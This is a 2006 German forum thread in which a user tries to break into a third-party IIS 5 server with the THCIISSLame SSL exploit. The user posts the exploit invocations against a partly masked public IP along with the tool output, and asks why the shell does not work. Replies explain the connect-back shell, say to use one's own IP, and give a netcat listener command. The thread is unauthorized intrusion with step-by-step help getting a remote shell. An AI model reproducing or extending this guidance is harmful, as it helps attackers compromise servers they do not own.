IIS 5 SSL Exploit?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von MasterJulian, 10. August 2006 .

Schlagworte:
  1. 10. August 2006
    Ich habe heute versucht einen iis 5 server mittels ssl exploit zu hacken:
    iis5ssl 66.196.xxx.xxx 127.0.0.1 1234

    THCIISSLame v0.3 - IIS 5.0 SSL remote root exploit
    tested on Windows 2000 Server german/english SP4
    by Johnny Cyberpunk (jcyberpunk@thc.org)

    [*] building buffer
    [*] connecting the target
    [*] exploit send
    [*] waiting for shell

    dan hab ich über telnet auf localhost 1234 verbunden:

    [*] Exploit successful ! Have fun !
    [*] --------------------------------------------------------------------

    Jedoch kahm da nur ein schwarzes bild und die eingabe hat nicht funktioniert. Wie verwende ich diesen Exploit richtig?
     
  2. 10. August 2006
    is das ne rerverse shell? weil dann musste die ja irgendwie "abfangen" ^^
     
  3. 10. August 2006
    hab ich auch gedacht, aber wenn ich eine shell auf dem port eröffne, bekomme ich einen bind error
     
  4. 11. August 2006
    OMG!
    Das is ne connectback shell.
    Also die zu dir connectet, ergo NICHT localhost angeben.... omg sondern deine ip und dann netcat anschmeißen.
     
  5. 11. August 2006
    kommt aufs gleiche raus. Ich geb meine online ip an (port 666 ist weitergeleitet) und Netcat is auf 666 (nc -l -vv -p 666) eingestellt:
    D:\Hacking\expl0its\iis5>iis5ssl 66.196.XXX.XXX 84.170.XXX.XXX 666

    THCIISSLame v0.3 - IIS 5.0 SSL remote root exploit
    tested on Windows 2000 Server german/english SP4
    by Johnny Cyberpunk (jcyberpunk@thc.org)

    [*] building buffer
    [*] connecting the target
    [*] exploit send
    bind error() 10048
     
  6. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.